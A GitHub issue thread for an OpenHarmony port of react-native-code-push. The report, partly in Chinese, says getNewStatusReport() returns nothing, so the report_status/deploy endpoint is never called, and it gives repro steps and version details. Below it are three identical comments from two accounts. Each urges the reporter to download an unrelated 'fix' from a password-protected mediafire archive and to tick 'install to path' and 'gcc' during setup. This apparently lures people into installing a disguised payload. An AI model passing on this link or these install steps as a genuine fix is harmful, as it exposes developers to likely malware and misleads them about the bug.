### ISSUE TITLE
getNewStatusReport 方法调用失败，未有返回值

### ISSUE THREAD

**Issue by dream-approaching** [react-native-oh-library/react-native-code-push#30]
### 描述 / Description

getNewStatusReport 没有返回值导致report_status/deploy未调用

### 复现步骤 / Steps to reproduce

1、应用侧调用CodePush.notifyAppReady();
2、查看NativeCodePush.getNewStatusReport();是否有返回值
3、检查是否触发report_status/deploy接口

### 库版本 / Library version

8.2.2-0.0.8

### React Native OpenHarmony version

0.72.28

### 构建类型 / Build type

Debug app & dev bundle

### 设备 / Device

Real device

### 设备版本 / Device model

Mate 60（NEXT.0.0.60）

### 已悉知 / Acknowledgements

Yes

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
